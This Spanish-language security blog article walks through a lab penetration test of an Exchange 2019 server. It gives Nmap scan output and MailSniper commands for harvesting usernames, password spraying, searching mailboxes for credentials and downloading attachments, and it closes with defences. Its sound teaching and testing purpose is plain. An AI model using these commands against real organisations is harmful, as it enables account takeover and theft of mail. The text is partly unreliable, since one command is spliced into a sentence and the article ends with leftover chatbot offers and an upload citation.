Red Hot Cyber
La ciberseguridad se comparte. Reconozca el riesgo, combátalo, comparta sus experiencias y anime a otros a hacerlo mejor que usted.
Buscar
UtiliaCS 320x100
970x120
Pruebas de penetración en Microsoft Exchange Server: Técnicas, herramientas y contramedidas

Pruebas de penetración en Microsoft Exchange Server: Técnicas, herramientas y contramedidas

Alessandro Molinari : 6 noviembre 2025 07:03

Con frecuencia, durante las pruebas de penetración, obtenemos acceso privilegiado (Administrador de Dominio) dentro de una organización. Algunas empresas se detienen ahí, pensando que obtener el rol de Administrador de Dominio es el objetivo final.

Pero no es así. «Obtener privilegios de administrador de dominio» no significa mucho para la mayoría de los ejecutivos, más allá de demostrar el riesgo que conlleva. Una de las mejores maneras de demostrar ese riesgo a una organización es demostrar la capacidad de acceder a datos confidenciales.

Aquí describimos las pruebas de penetración de Exchange 2019 en un laboratorio GOADv3 configurado en Ludus/Debian.


El servidor Exchange de destino

Herramientas utilizadas

La principal herramienta utilizada es MailSniper , un conjunto de herramientas de PowerShell diseñado para la enumeración interna y el abuso de buzones de Exchange a través de Exchange Web Services (EWS), Outlook Web Access (OWA) y otros puntos de conexión estándar.

También utilicé NetExec desde una máquina Kali, pero MailSniper dio problemas en powershell-linux y tuve que recurrir a Win11Pro:

MailSniper no funcionaba en Kali
Aquí está el escaneo NXC de todo el entorno

Fase 1: Reconocimiento e identificación del servidor de Exchange

Antes de cualquier actividad de intrusión, es esencial localizar con precisión el servidor de Exchange.

  • Comienza con la recopilación de OSINT , a través de registros DNS MX, URL públicas de OWA, Autodiscover, certificados TLS y metadatos visibles de publicaciones de trabajo o documentos públicos.
  • A continuación, realizamos escaneos dirigidos con Nmap contra servicios estándar:
 nmap -p25,80,443,445,587,993,995 -sV -oA exchange_scan 10.3.10.21

Este escaneo detecta los puertos SMTP y HTTPS para OWA, SMB y servicios de correo seguro.

 # Escaneo Nmap 7.95 iniciado el miércoles 15 de octubre de 2025 a las 12:52:25 como: /usr/lib/nmap/nmap --privileged -A -T 4 -Pn -oA /mnt/hgfs/VMsharedDownloads/Exchange2019InitialScan 10.3.10.21
Informe de escaneo Nmap para 10.3.10.21
El host está activo (latencia de 0,0027 s).
No se muestran: 975 puertos TCP cerrados (reinicio)
VERSIÓN DEL SERVICIO DE ESTADO DEL PUERTO
25/tcp abierto smtp Microsoft Exchange smtpd
|_smtp-ntlm-info: ERROR: Falló la ejecución del script (use -d para depurar)
| ssl-cert: Sujeto: nombre común=the-eyrie
| Nombre alternativo del sujeto: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-11T01:42:31
|_No válido después del: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hola [198.51.100.2], TAMAÑO 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, SMTPUTF8, XRDST
Este servidor admite los siguientes comandos: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
80/tcp abierto http Microsoft IIS httpd 10.0
|_http-title: El sitio no tiene título.
81/tcp abierto http Microsoft IIS httpd 10.0
|_http-title: 403 - Prohibido: Acceso denegado.
135/tcp abierto msrpc RPC de Microsoft Windows
139/tcp abierto netbios-ssn Microsoft Windows netbios-ssn
443/tcp abierto ssl/https
| ssl-cert: Sujeto: nombre común=the-eyrie
| Nombre alternativo del sujeto: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-11T01:42:31
|_No válido después del: 2030-10-11T01:42:31
| http-title: Outlook
El recurso solicitado fue https://10.3.10.21/owa/auth/logon.aspx?url=https%3a%2f%2f10.3.10.21%2fowa%2f&reason=0
¿444/tcp abierto SNPP?
445/tcp abierto microsoft-ds?
465/tcp abierto smtp Microsoft Exchange smtpd
| ssl-cert: Sujeto: nombre común=the-eyrie
| Nombre alternativo del sujeto: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-11T01:42:31
|_No válido después del: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hola [198.51.100.2], TAMAÑO 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH GSSAPI NTLM, XEXCH50, SMTPUTF8, XRDST, XSHADOWREQUEST
Este servidor admite los siguientes comandos: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info: 
| Nombre del destino: SIETE REINOS
| Nombre de dominio NetBIOS: SEVENKINGDOMS
| Nombre_de_equipo_NetBIOS: THE-EYRIE
| Nombre de dominio DNS: sevenkingdoms.local
| Nombre_de_equipo_DNS: the-eyrie.sevenkingdoms.local
| Nombre del árbol DNS: sevenkingdoms.local
|_ Versión del producto: 10.0.17763
587/tcp abierto smtp Microsoft Exchange smtpd
| ssl-cert: Sujeto: nombre común=the-eyrie
| Nombre alternativo del sujeto: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-11T01:42:31
|_No válido después del: 2030-10-11T01:42:31
| smtp-commands: the-eyrie.sevenkingdoms.local Hola [198.51.100.2], TAMAÑO 37748736, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, SMTPUTF8
Este servidor admite los siguientes comandos: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
|_smtp-ntlm-info: ERROR: Falló la ejecución del script (use -d para depurar)
593/tcp abierto ncacn_http Microsoft Windows RPC sobre HTTP 1.0
808/tcp abierto ccproxy-http?
¿Abrir msmq en 1801/tcp?
2103/tcp abierto zephyr-clt?
2105/tcp abierto eklogin?
2107/tcp abierto msmq-mgmt?
2525/tcp abierto smtp Microsoft Exchange smtpd
| smtp-commands: the-eyrie.sevenkingdoms.local Hola [198.51.100.2], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, XRDST, XSHADOWREQUEST
Este servidor admite los siguientes comandos: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| ssl-cert: Sujeto: nombre común=the-eyrie
| Nombre alternativo del sujeto: DNS:the-eyrie, DNS:the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-11T01:42:31
|_No válido después del: 2030-10-11T01:42:31
¿3389/tcp abierto ms-wbt-server?
| rdp-ntlm-info: 
| Nombre del destino: SIETE REINOS
| Nombre de dominio NetBIOS: SEVENKINGDOMS
| Nombre_de_equipo_NetBIOS: THE-EYRIE
| Nombre de dominio DNS: sevenkingdoms.local
| Nombre_de_equipo_DNS: the-eyrie.sevenkingdoms.local
| Nombre del árbol DNS: sevenkingdoms.local
| Versión del producto: 10.0.17763
|_ Hora del sistema: 2025-10-15T16:52:55+00:00
| ssl-cert: Sujeto: commonName=the-eyrie.sevenkingdoms.local
| No válido antes del: 2025-10-07T10:19:37
|_No válido después del: 2026-04-08T10:19:37
3800/tcp abierto http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: No se encontró
3801/tcp abierto mc-nmf .NET Enmarcado de mensajes
3828/tcp abierto mc-nmf .NET Enmarcado de mensajes
5985/tcp abierto http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: No se encontró
5986/tcp ¿WSMAN abierto?
| ssl-cert: Sujeto: nombreComún=WIN2019-SRV-X64
| Nombre alternativo del sujeto: DNS:WIN2019-SRV-X64, DNS:WIN2019-SRV-X64
| No válido antes del: 19/09/2025 a las 18:32:07
|_No válido después del: 2035-09-17T18:32:07
6001/tcp abierto ncacn_http Microsoft Windows RPC sobre HTTP 1.0
6789/tcp abierto ibm-db2-admin?
Tipo de dispositivo: de uso general
Sistema operativo: Microsoft Windows 2019
Sistema operativo del CPE: cpe:/o:microsoft:windows_server_2019
Detalles del sistema operativo: Microsoft Windows Server 2019
Distancia de red: 3 saltos
Información del servicio: Host: the-eyrie.sevenkingdoms.local; SO: Windows; CPE: cpe:/o:microsoft:windows

Enumeración de usuarios y puntos de conexión de correo

 Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 

Enumeración de usuarios y puntos de conexión de correo

Tras localizar el servidor, procedemos a recopilar usuarios válidos, lo cual es esencial para ataques como el de fuerza bruta o el de pulverización de contraseñas.

Con MailSniper puedes extraer usuarios del punto de conexión OWA y de la Lista Global de Direcciones (GAL) :

 Invoke-UsernameHarvestOWA -UserList .users.txt -ExchHostname 10.3.10.21 -Domain SEVENKINGDOMS -OutFile AccountsTrovati.txt 
 Invoke-DomainHarvestOWA -ExchHostname 10.3.10.21 -OutFile userlist.txt Get-GlobalAddressList -ExchHostname 10.3.10.21 -UserName "domainuser" -Password "Password!" -OutFile gal.txt

Una lista de usuarios bien definida permite simular ataques dirigidos probando contraseñas realistas basadas en el contexto (por ejemplo, Juego de Tronos simulado en el laboratorio), utilizando obviamente diversas técnicas OSINT.

MailSniper simplemente extrae usuarios de la lista conocida por Exchange, la que nosotros vemos.

Fase 3: Prueba de contraseñas y acceso inicial

Utilizando contraseñas realistas derivadas de información pública y contextual, el ataque de fuerza bruta contra contraseñas se realiza con MailSniper en ActiveSync EAS, OWA o SMTP:

 Una vez que tenga un acceso válido, como una combinación de usuario/contraseña, puede usar PowerShell para acceder al buzón a través de EWS y comenzar la fase posterior a la explotación. Invoke-PasswordSpray -UserList userlist.txt -ExchHost 10.3.10.21 -Password "ilovejaime" -OutFile spray_results.txt 


Las credenciales son correctas:

Post-explotación y búsqueda de información sensible

Con MailSniper, desde una cuenta comprometida, puedes:

  • Busque en su buzón de correo electrónico credenciales ilícitas o información confidencial:
 Invoke-SelfSearch -Mailbox [email protected] -Terms "password","vpn","confidential" 
  • Enumere los archivos adjuntos y descárguelos para su análisis externo:
 Invoke-SelfSearch -Mailbox [email protected] -CheckAttachments -DownloadDir C:loot 
  • Si tiene un rol administrativo con permisos de suplantación de identidad, amplíe la búsqueda globalmente a los buzones de correo de la red:
 Invoke-GlobalMailSearch -ImpersonationAccount "dominioadmin" -ExchHostname 10.3.10.21 -Terms "contraseña","confidencial" -OutputCsv all_mail_search.csv

Privilegios de movimiento lateral y escalada

El acceso a los buzones de correo permite buscar credenciales de cuentas privilegiadas (por ejemplo, administrador de dominio), que a menudo se presentan como archivos adjuntos o mensajes.

Con estas credenciales podrás:

  • Acceda a los sistemas internos mediante RDP o comunicación remota con PowerShell.
  • Utilizar técnicas como Kerberoasting (solicitar un ticket Kerberos a los servicios de Exchange) para obtener hashes que descifrar.
  • Utilice la delegación de Exchange y los permisos de buzón para enviar correos electrónicos con la opción «Enviar como» y moverse por el dominio.

Comandos útiles para controlar los permisos del buzón de correo:

 Invoke-MailboxPermsAudit -ExchHostname 10.3.10.21 -UserName "dominiousuario" -Password "contraseña" -OutFile mailbox_permissions.csv

Defensas recomendadas contra ataques de intercambio

Para mitigar los riesgos señalados:

  • Restringir permisos de buzón y delegación : Solo los roles estrictamente necesarios deberían poder suplantar la identidad de otros o enviar correos electrónicos en su nombre.
  • Monitoreo de la actividad de Exchange : Registro detallado de la autenticación, el uso de EWS y los intentos de correo sospechosos.
  • Actualizaciones oportunas : Instale parches contra vulnerabilidades conocidas como ProxyLogon, ProxyShell y vulnerabilidades de día cero emergentes.
  • Autenticación multifactor (MFA) en OWA, EAS y acceso remoto de PowerShell para reducir la efectividad del relleno de credenciales.
  • Segmentación de red : Aísle los servidores de Exchange y restrinja el acceso desde la DMZ y la zona interna según el principio de mínimo privilegio.
  • Controles y bloqueos contra ataques de fuerza bruta con contraseñas : Implemente políticas de bloqueo, análisis de comportamiento y herramientas internas para identificar inicios de sesión sospechosos.

(Imagen: Diagrama de red con segmentación y control de acceso)

Conclusiones

Las pruebas de penetración en un servidor Exchange 2019 requieren una metodología compleja que abarca desde un reconocimiento exhaustivo, pasando por ataques dirigidos como el ataque de fuerza bruta a contraseñas, hasta el abuso de buzones de correo posterior a la intrusión para obtener acceso a la red.

El laboratorio GOADv3 en Ludus/Debian proporciona un entorno ideal para simular de forma segura estas técnicas, lo que le permite perfeccionar sus capacidades ofensivas y, lo que es más importante, probar sus defensas informáticas.

El uso de herramientas como MailSniper facilita la búsqueda de credenciales, permisos y datos confidenciales, demostrando claramente el riesgo que supone una vulneración de Exchange para una organización.

Implementar defensas robustas y una monitorización continua es clave para reducir la superficie de ataque y frenar a los ciberadversarios actuales.

Si le interesa, también puedo proporcionarle un script automatizado de PowerShell para algunos de los procedimientos anteriores en una fecha posterior.

Si lo desea, también puedo crear textos con formato Markdown para publicaciones o documentos técnicos. ¿Desea continuar?

Fuentes
[1] test-art.pdf https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/104559465/763883a6-3f2a-41af-8d8a-e00efdd5acb4/test-art.pdf

Artículos destacados

Immagine del sito
¡Notepad++ bajo ataque! Cómo una DLL falsa abre la puerta a los ciberdelincuentes.
Di Manuel Roccon - 06/11/2025

En septiembre se publicó una nueva vulnerabilidad que afecta a Notepad++. Esta vulnerabilidad, identificada como CVE-2025-56383, puede consultarse en el sitio web del NIST para obtener más informaci...

Immagine del sito
Una peligrosa vulnerabilidad de día cero y ejecución sin clic amenaza a miles de millones de dispositivos Android
Di Redazione RHC - 05/11/2025

Google ha emitido un aviso urgente sobre una vulnerabilidad crítica en Android que permite a los atacantes ejecutar código arbitrario en el dispositivo sin interacción del usuario. La vulnerabilida...

Immagine del sito
¿Utiliza Microsoft macOS para crear fondos de pantalla de Windows? ¡Probablemente!
Di Redazione RHC - 04/11/2025

El 29 de octubre, Microsoft publicó un fondo de pantalla para conmemorar el undécimo aniversario del programa Windows Insider , y se especula que fue creado utilizando macOS. Recordemos que Windows ...

Immagine del sito
Robo del Louvre: Windows 2000 y Windows XP en redes, así como contraseñas sencillas
Di Redazione RHC - 04/11/2025

Los ladrones entraron por una ventana del segundo piso del Museo del Louvre, pero el museo tenía problemas que iban más allá de las ventanas sin asegurar, según un informe de auditoría de ciberse...

Immagine del sito
Trump se niega a exportar chips de Nvidia. China responde: «No se preocupe, lo haremos nosotros mismos».
Di Redazione RHC - 04/11/2025

Reuters informó que Trump declaró a la prensa durante una entrevista pregrabada para el programa «60 Minutes» de CBS y a bordo del Air Force One durante el vuelo de regreso: «No vamos a permitir ...